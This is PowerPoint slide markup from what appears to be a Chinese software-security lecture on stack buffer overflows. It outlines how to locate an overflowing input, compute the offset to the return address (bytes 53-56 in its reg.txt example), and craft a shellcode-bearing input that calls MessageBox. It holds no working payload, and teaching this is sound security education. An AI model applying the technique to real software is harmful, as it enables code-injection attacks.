          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5136783" y="2718143"/>
              <a:ext cx="820898" cy="707888"/>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 name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C245BE7-4697-4204-BEE1-6D1DFBD9019C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6718999" y="2471924"/>
              <a:ext cx="729199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弄清楚程序有几个输入点，这些输入将最终会当作哪个函数的第几个参数读入到内存的那一个区域，哪一个输入会造成栈溢出，在复制到栈区的时候对这些数据有没有额外的限制等；</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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8" name="直接连接符 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D55EB8-84E5-48E3-BE02-B021CB4F900E}"/>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9" name="组合 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391E7793-1B4A-47CB-B24A-9FF6E35337C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484277" y="4503065"/>
            <a:ext cx="10201683" cy="707888"/>
            <a:chOff x="5136783" y="2718143"/>
            <a:chExt cx="8874216" cy="707888"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="六边形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9540D17F-314B-44ED-9C3D-DFE74BE8074A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5136783" y="2718143"/>
              <a:ext cx="820898" cy="707888"/>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文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4BD903-3ADC-4887-8CDE-65526103294D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744974" y="2841256"/>
              <a:ext cx="72660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调试之后还要计算函数返回地址距离缓冲区的偏移并淹没之</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a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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32" name="直接连接符 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D94C6F-D23C-45A4-A225-65AC9FAB5AD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4" name="组合 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234669D8-1A65-4708-BBE4-5779C389ECDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484277" y="5450205"/>
            <a:ext cx="10201682" cy="1046440"/>
            <a:chOff x="5136783" y="2615847"/>
            <a:chExt cx="9123361" cy="1046440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="六边形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA071AC-983F-453B-AFF8-E8B9C589D4B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5136783" y="2718143"/>
              <a:ext cx="820898" cy="707888"/>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 name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2A096A-59CD-41DC-97C1-4483D70200F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6790123" y="2615847"/>
              <a:ext cx="7470021"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选择指令的地址</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 </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最终制作出一个有攻击效果的“承载”着</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shellcode</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的输入字符串。</a:t>
              </a:r>
              <a:b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br>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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37" name="直接连接符 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E56752-54C3-4141-8ED3-F4E0C5D829DC}"/>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2" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3179083" y="412810"/>
            <a:ext cx="6624735" cy="539219"/>
            <a:chOff x="5044907" y="917568"/>
            <a:chExt cx="2768934" cy="394502"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5202510" y="1312070"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5044907" y="917568"/>
              <a:ext cx="2768934" cy="337762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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基于上述程序，编写</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，完成代码植入</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4037720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left)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="5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ipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="2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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388815" y="2328253"/>
            <a:ext cx="10009112" cy="1216063"/>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植入一段代码，使其达到可以淹没返回地址，该返回地址将执行一个</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MessageBox</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函数，弹出窗体。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388815" y="1744117"/>
            <a:ext cx="299090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目标</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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3CFB2C-5281-4F62-9C80-76D4A8EE959C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388815" y="4624437"/>
            <a:ext cx="10009112" cy="1364114"/>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为了能淹没返回地址，需要在</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reg.txt</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中至少写入：</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buffer</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44</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字节）</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+flag</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字节）</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前</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EBP</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值（</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字节），也就是</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53-56</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字节才是要淹没的地址。</a:t>
            </a:r>
          </a:p>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让程序弹出一个消息框只需要调用</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Windows</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MessageBox</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23" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CAADFC-AF19-403A-8FDD-4CC67175A35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388815" y="4040300"/>
            <a:ext cx="2990900" cy="576064"/>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为了能淹没返回地址</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9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3261023" y="530326"/>
            <a:ext cx="6624735" cy="539219"/>
            <a:chOff x="5044907" y="917568"/>
            <a:chExt cx="2768934" cy="394502"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5202510" y="1312070"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5044907" y="917568"/>
              <a:ext cx="2768934" cy="337762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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基于上述程序，编写</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，完成代码植入</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299615237"/>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6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decel="6000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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21"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P spid="22" grpId="0" animBg="1"/>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47273" y="952029"/>
            <a:ext cx="4536504" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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MSDN</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对</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MessageBox</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函数的解释如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83921E20-458B-4CD1-8C63-FDCF66D5DA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6401569" y="1705305"/>
            <a:ext cx="5184576" cy="4544443"/>
            <a:chOff x="6401569" y="1705305"/>
            <a:chExt cx="5184576" cy="4544443"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36B640D-323F-4E8D-8F83-C583F7817E9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6401569" y="1705305"/>
              <a:ext cx="5184576" cy="1058442"/>
              <a:chOff x="6357367" y="1705305"/>
              <a:chExt cx="5184576" cy="1058442"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="组合 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED277028-66AB-48A7-90F2-5B50FC3D12F0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6357367" y="1705305"/>
                <a:ext cx="5184576" cy="1058442"/>
                <a:chOff x="4933525" y="2542866"/>
                <a:chExt cx="5184576" cy="1058442"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="6" name="六边形 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2400D9-00FB-4D0D-888B-AEA2EACD3499}"/>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lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7" name="文本框 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841940CD-C47E-41B2-A768-FE9E2D6425E5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6984268" y="2564257"/>
                  <a:ext cx="313383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000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>消息框所属窗口的句柄，如果为</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>NULL</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>，消息框则不属于任何窗口。</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="8" name="直接连接符 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA024F0-FB86-4A52-A7AC-71B2D2E3A25E}"/>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9" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1484E726-A1F2-4BAB-A7D7-08B7D0D4FE87}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6542172" y="2006935"/>
                <a:ext cx="9231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000" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>hWind</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F16A3B-EFE2-4BA8-A98F-1F5B0586A32C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6401569" y="2867305"/>
              <a:ext cx="5184576" cy="1058442"/>
              <a:chOff x="6357367" y="2896245"/>
              <a:chExt cx="5184576" cy="1058442"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9" name="组合 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71DCC35B-DC86-42F9-A0B6-4C0C0647AAF5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6357367" y="2896245"/>
                <a:ext cx="5184576" cy="1058442"/>
                <a:chOff x="4933525" y="2542866"/>
                <a:chExt cx="5184576" cy="1058442"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10" name="六边形 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65058BB7-2961-4ED2-8F8B-45612D0257C9}"/>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lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11" name="文本框 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB340CBF-64C8-47A3-8F6D-D900D9CC2327}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6984268" y="2718144"/>
                  <a:ext cx="313383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000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>字符串指针，所指字符串会在消息框中显示。</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="12" name="直接连接符 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12120383-45AB-4B7B-95ED-49B69AC1D50A}"/>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0" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D17CE34-8E98-4C72-BA98-D4146CD0EF28}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6606786" y="3197875"/>
                <a:ext cx="7864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000" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>lpTex</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="组合 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE62B7D-5FD4-488E-90D5-A9F93923BAA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6401569" y="4029305"/>
              <a:ext cx="5184576" cy="1058442"/>
              <a:chOff x="6357367" y="4000366"/>
              <a:chExt cx="5184576" cy="1058442"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="21" name="组合 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4105B06-102E-43AD-90E0-A129DD772034}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6357367" y="4000366"/>
                <a:ext cx="5184576" cy="1058442"/>
                <a:chOff x="4933525" y="2542866"/>
                <a:chExt cx="5184576" cy="1058442"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="六边形 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0438DF7B-55B2-4618-B98E-8FAD60F41438}"/>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lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="23" name="文本框 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E54651-7E8F-4DD9-B56D-4950DF6D4E47}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6984268" y="2718145"/>
                  <a:ext cx="313383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000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>字符串指针，所指字符串将成为消息框的标题。</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="24" name="直接连接符 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C344ED-757B-43A0-9C9A-5DD5AC855B23}"/>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9" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF262B6-B446-4722-8D83-66EC737B072B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
